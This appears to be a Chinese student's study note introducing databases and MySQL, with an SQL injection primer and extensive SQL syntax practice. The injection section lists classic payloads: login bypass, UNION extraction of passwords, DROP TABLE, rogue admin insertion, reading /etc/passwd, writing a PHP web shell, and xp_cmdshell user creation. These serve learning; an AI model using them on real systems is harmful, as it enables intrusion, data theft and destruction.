1.初步了解数据库(MySQL)
一、 什么是数据库
数据库(DataBase,简称DB)
1.概念 : 长期存放在计算机内,有组织,可共享的大量数据的集合,是一个数据"仓库"
2.作用 : 保存,并能安全管理数据(如:增删改查等),减少冗余…
数据库总览 :
4.关系型数据库 (SQL)
MySQL , Oracle , SQL Server , SQLite , DB2 , …
关系型数据库通过外键关联来建立表与表之间的关系
非关系型数据库*(NOSQL)*
Redis , MongoDB , …
非关系型数据库通常指数据以对象的形式存储在数据库中,而对象之间的关系通过每个对象自身的属性来决定
二、什么是DBMS
数据库管理系统( DataBase Management System )
数据库管理软件 , 科学组织和存储数据 , 高效地获取和维护数据
mysql是现在流行的开源的,免费的 关系型数据库,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。
特点:
1.免费 , 开源数据库
2.小巧 , 功能齐全
3.使用便捷
4.可运行于Windows或Linux操作系统
5.可适用于中小型甚至大型网站应用
6.官网 : https://www.mysql.com/
2.初步了解sql注入漏洞
一、什么是SQl注入漏洞
1.概念
SQL注入(SQL Injection)是一种常见的Web安全漏洞,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而操控后端数据库查询,获取、修改或删除数据库中的敏感数据。
2.基本原理
SQL注入漏洞产生的原因是应用程序将用户输入直接拼接到SQL查询语句中,而没有进行适当的过滤或参数化处理。当恶意输入被当作SQL代码执行时,就可能导致非预期的数据库操作。
3.注入过程
二、SQl注入功能
1. 数据泄露(绕过登录验证)
具体操作:
-- 输入用户名: admin' --
-- 输入密码: (任意值)
-- 实际执行的SQL:
SELECT * FROM users WHERE username='admin' --' AND password='xxx'
效果:注释掉密码检查,直接以 admin 身份登录。
2. 数据泄露(获取数据库内容)
具体操作:
-- 正常查询:
SELECT title, content FROM articles WHERE id=1
-- 注入攻击:
1' UNION SELECT username, password FROM users --
效果:返回 users 表中的账号密码数据。
3. 数据篡改(修改数据库记录)
具体操作:
-- 正常更新:
UPDATE profile SET bio='Hello' WHERE user_id=100
-- 注入攻击:
100'; UPDATE users SET password='hacked' WHERE username='admin' --
效果:修改 admin 的密码为 hacked。
4. 数据删除(清空数据库表)
具体操作:
-- 正常删除:
DELETE FROM orders WHERE order_id=123
-- 注入攻击:
123'; DROP TABLE users --
效果:删除整个 users 表,导致数据丢失。
5. 权限提升(创建管理员账户)
具体操作:
-- 正常插入:
INSERT INTO customers (name, email) VALUES ('test', 'test@example.com')
-- 注入攻击:
test', 'test@example.com'); INSERT INTO admins (username, password) VALUES ('hacker', 'p@ssw0rd') --
效果:在 admins 表中插入一个管理员账户。
6. 服务器文件读取(获取敏感文件)
具体操作(MySQL):
-- 注入攻击:
1' UNION SELECT LOAD_FILE('/etc/passwd'), NULL --
效果:返回服务器的 /etc/passwd 文件内容(Linux用户信息)。
7. 服务器文件写入(上传Webshell)
具体操作(MySQL):
-- 注入攻击:
1' UNION SELECT "<?php system($_GET['cmd']); ?>", NULL INTO OUTFILE '/var/www/html/shell.php' --
效果:在网站根目录写入 shell.php,攻击者可执行任意命令。
8. 操作系统命令执行(控制服务器)
具体操作(SQL Server):
-- 注入攻击:
1'; EXEC xp_cmdshell 'net user hacker P@ssw0rd /add' --
效果:在服务器上创建新用户 hacker,用于远程登录。
3.练习sql语句
1、DDL:操作数据库
1.1 查询所有的数据库 show databases; 1.2 创建数据库 create database 数据库名称; 创建数据库(判断,如果不存在则创建) create database if not exists 数据库名称; 1.3 删除数据库 drop database 数据库名称; 创建数据库(判断,如果不存在则创建) create database if not exists 数据库名称; 1.4 使用数据库 数据库创建好了,要在数据库中创建表,得先明确在哪儿个数据库中操作,此时就需要使用数据库。 use 数据库名称; select database(); ------》查看当前使用的数据库2、DDL:操作表
操作表也就是对表进行增(Create)删(Retrieve)改(Update)查(Delete)。
2.1 查询表 查询当前数据库下所有表名称 -------》 show tables; 查询表结构 ------------- --------》 desc 表名称; 2.2 创建表 create table 表名 ( 字段名1 数据类型1, 字段名2 数据类型2, 字段名n 数据类型n ); 例如: create table tb_user ( id int, username varchar(20), password varchar(32) ); 2.3 表的数据类型 数值------------------------------- tinyint : 小整数型,占一个字节 int : 大整数类型,占四个字节 eg : age int double : 浮点类型 使用格式: 字段名 double(总长度,小数点后保留的位数) eg : score double(5,2) 日期---------------------------------------------- date : 日期值。只包含年月日 eg :birthday date : datetime : 混合日期和时间值。包含年月日时分秒 字符串--------------------------------------------- char : 定长字符串。 优点:存储性能高 缺点:浪费空间 eg : name char(10) 如果存储的数据字符个数不足10个,也会占10个的空间 varchar : 变长字符串。 优点:节约空间 缺点:存储性能底 eg:name varchar(10) 如果存储的数据字符个数不足10个,那就数据字符个数是几就占几个的空间创建表案例:
需求:设计一张学生表,请注重数据类型、长度的合理性 1. 编号 2. 姓名,姓名最长不超过10个汉字 3. 性别,因为取值只有两种可能,因此最多一个汉字 4. 生日,取值为年月日 5. 入学成绩,小数点后保留两位 6. 邮件地址,最大长度不超过 64 7. 家庭联系电话,不一定是手机号码,可能会出现 - 等字符 8. 学生状态(用数字表示,正常、休学、毕业...) create table student ( id int, name varchar(10), gender char(1), birthday date, score double(5,2), email varchar(15), tel varchar(15), status tinyint );3.删除表
删除表 drop table 表名; 删除表时判断表是否存在 drop table if exists 表名;4.修改表
修改表名 alter table 表名 rename to 新的表名; -- 将表名student修改为stu alter table student rename to stu; 添加一列 alter table 表名 add 列名 数据类型; -- 给stu表添加一列address,该字段类型是varchar(50) alter table stu add address varchar(50); 修改数据类型 alter table 表名 modify 列名 新数据类型; -- 将stu表中的address字段的类型改为 char(50) alter table stu modify address char(50); 修改列名和数据类型 alter table 表名 change 列名 新列名 新数据类型; -- 将stu表中的address字段名改为 addr,类型改为varchar(50) alter table stu change address addr varchar(50); 删除列 alter table 表名 drop 列名; -- 将stu表中的addr字段 删除 alter table stu drop addr;5、DML:操作表中的数据
DML主要是对数据进行增(insert)删(delete)改(update)操作。
给指定列添加数据 insert into 表名(列名1,列名2,…) values(值1,值2,…); 给全部列添加数据 insert into 表名 values(值1,值2,…); 批量添加数据 insert into 表名(列名1,列名2,…) values(值1,值2,…),(值1,值2,…),(值1,值2,…)…; insert into 表名 values(值1,值2,…),(值1,值2,…),(值1,值2,…)…;- 练习增
select * from stu; 1 -- 给指定列添加数据 insert into stu (id, name) values (1, '张三'); -- 给所有列添加数据,列名的列表可以省略的 insert into stu (id,name,sex,birthday,score,email,tel,status) values (2,'李四','男','1999-11-11',88.88,'lisi@itcast.cn','13888888888',1); insert into stu values (2,'李四','男','1999-11-11',88.88,'lisi@itcast.cn','13888888888',1); -- 批量添加数据 insert into stu values (2,'李四','男','1999-11-11',88.88,'lisi@itcast.cn','13888888888',1), (2,'李四','男','1999-11-11',88.88,'lisi@itcast.cn','13888888888',1), (2,'李四','男','1999-11-11',88.88,'lisi@itcast.cn','13888888888',1); - 修改表数据
update 表名 set 列名1=值1,列名2=值2,… [where 条件] ; 1 注意: 修改语句中如果不加条件,则将所有数据都修改! 像上面的语句中的中括号,表示在写sql语句中可以省略这部分 练习 将张三的性别改为女 update stu set sex = '女' where name = '张三'; 将张三的生日改为 1999-12-12 分数改为99.99 update stu set birthday = '1999-12-12', score = 99.99 where name = '张三'; 注意:如果update语句没有加where条件,则会将表中所有数据全部修改! update stu set sex = '女'; - 删除数据
delete from 表名 [where 条件] ; 练习 -- 删除张三记录 delete from stu where name = '张三'; -- 删除stu表中所有的数据 delete from stu;
6、DQL:数据的查询
select 字段列表 from 表名列表 where 条件列表 group by 分组字段 having 分组后条件 order by 排序字段 limit 分页限定基础查询
查询多个字段 select 字段列表 from 表名; select * from 表名; -- 查询所有数据 去除重复记录 select distinct 字段列表 from 表名; 起别名 as: as 也可以省略 查询姓名、数学成绩、英语成绩。并通过as给math和english起别名(as关键字可以省略) select name,math as 数学成绩,english as 英文成绩 from stu; select name,math 数学成绩,english 英文成绩 from stu;条件查询
select 字段列表 from 表名 where 条件列表;条件查询练习
查询年龄大于20岁的学员信息 select * from stu where age > 20; 查询年龄大于等于20岁的学员信息 select * from stu where age >= 20; 查询年龄大于等于20岁 并且 年龄 小于等于 30岁 的学员信息 select * from stu where age >= 20 && age <= 30; select * from stu where age >= 20 and age <= 30; 上面语句中 && 和 and 都表示并且的意思。建议使用 and 。 也可以使用 between … and 来实现上面需求 select * from stu where age BETWEEN 20 and 30; 查询入学日期在’1998-09-01’ 到 ‘1999-09-01’ 之间的学员信息 select * from stu where hire_date BETWEEN '1998-09-01' and '1999-09-01'; 查询年龄等于18岁的学员信息 select * from stu where age = 18; 查询年龄不等于18岁的学员信息 select * from stu where age != 18; select * from stu where age <> 18; 查询年龄等于18岁 或者 年龄等于20岁 或者 年龄等于22岁的学员信息 select * from stu where age = 18 or age = 20 or age = 22; select * from stu where age in (18,20 ,22); 查询英语成绩为 null的学员信息 null值的比较不能使用 = 或者 != 。需要使用 is 或者 is not select * from stu where english = null; -- 这个语句是不行的 select * from stu where english is null; select * from stu where english is not null;模糊查询练习
模糊查询使用like关键字,可以使用通配符进行占位:
(1)_ : 代表单个任意字符
(2)% : 代表任意个数字符
查询姓’马’的学员信息 select * from stu where name like '马%'; 查询第二个字是’花’的学员信息 select * from stu where name like '_花%'; 查询名字中包含 ‘德’ 的学员信息 select * from stu where name like '%德%';排序查询
select 字段列表 from 表名 order by 排序字段名1 [排序方式1],排序字段名2 [排序方式2] …; ASC : 升序排列 (默认值) DESC : 降序排列 注意:如果有多个排序条件,当前边的条件值一样时,才会根据第二条件进行排序 查询学生信息,按照年龄升序排列 select * from stu order by age ; 查询学生信息,按照数学成绩降序排列 select * from stu order by math desc ; 查询学生信息,按照数学成绩降序排列,如果数学成绩一样,再按照英语成绩升序排列 select * from stu order by math desc , english asc ;7、 聚合函数
将一列数据作为一个整体,进行纵向计算。
现有一需求让我们求表中所有数据的数学成绩的总和。这就是对math字段进行纵向求和。
聚合函数分类
函数名 功能
count(列名) 统计数量(一般选用不为null的列)
max(列名) 最大值
min(列名) 最小值
sum(列名) 求和
avg(列名) 平均值
聚合函数语法
select 聚合函数名(列名) from 表; 注意:null 值不参与所有聚合函数运算 统计班级一共有多少个学生 select count(*) from stu; 查询数学成绩的最高分 select max(math) from stu; 查询数学成绩的最低分 select min(math) from stu; 查询数学成绩的总分 select sum(math) from stu; 查询数学成绩的平均分 select avg(math) from stu; 查询英语成绩的最低分 select min(english) from stu;8、分页查询
从0开始查询,查询3条数据 select * from stu limit 0 , 3; 每页显示3条数据,查询第1页数据 select * from stu limit 0 , 3; 每页显示3条数据,查询第2页数据 select * from stu limit 3 , 3; 每页显示3条数据,查询第3页数据 select * from stu limit 6 , 3; 从上面的练习推导出起始索引计算公式: 起始索引 = (当前页码 - 1) * 每页显示的条数
